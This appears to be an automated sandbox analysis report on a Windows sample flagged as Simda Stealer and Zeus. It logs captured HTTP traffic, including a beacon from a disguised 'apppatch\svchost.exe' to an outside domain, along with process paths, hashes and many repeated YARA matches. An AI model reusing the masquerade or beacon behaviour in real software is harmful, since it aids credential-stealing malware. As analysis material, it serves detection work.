                                                                                                                                                                                                              2024-08-23 16:49:02 UTC1369INData Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66
                                                                                                                                                                                                              Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
                                                                                                                                                                                                              2024-08-23 16:49:02 UTC1369INData Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b
                                                                                                                                                                                                              Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.456400188.114.96.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:49:03 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:49:03 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:49:04 UTC761INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:04 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwGf3JCF6iWzNbjzMuuGFqoGw6V69VsQY4tEAyAbklo2p8mFQh9HH%2B4%2FPCT9uqqICWfsuoH9p%2FWwj3hm94Wuz29LgWXS9kHwMGSlvDsQcY1JgK1mXAjqW9hrnl%2Bmhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c97fe8f874349-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:49:04 UTC608INData Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-08-23 16:49:04 UTC1369INData Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65
                                                                                                                                                                                                              Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe


                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:12:46:57
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Bonelessness.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Bonelessness.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:213'504 bytes
                                                                                                                                                                                                              MD5 hash:475FEAF47584EA0673437174181F5019
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:12:46:58
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:213'504 bytes
                                                                                                                                                                                                              MD5 hash:579DA5BACB532A6B1670BE4418070F62
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:12:47:33
                                                                                                                                                                                                              Start date:23/08/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
                                                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
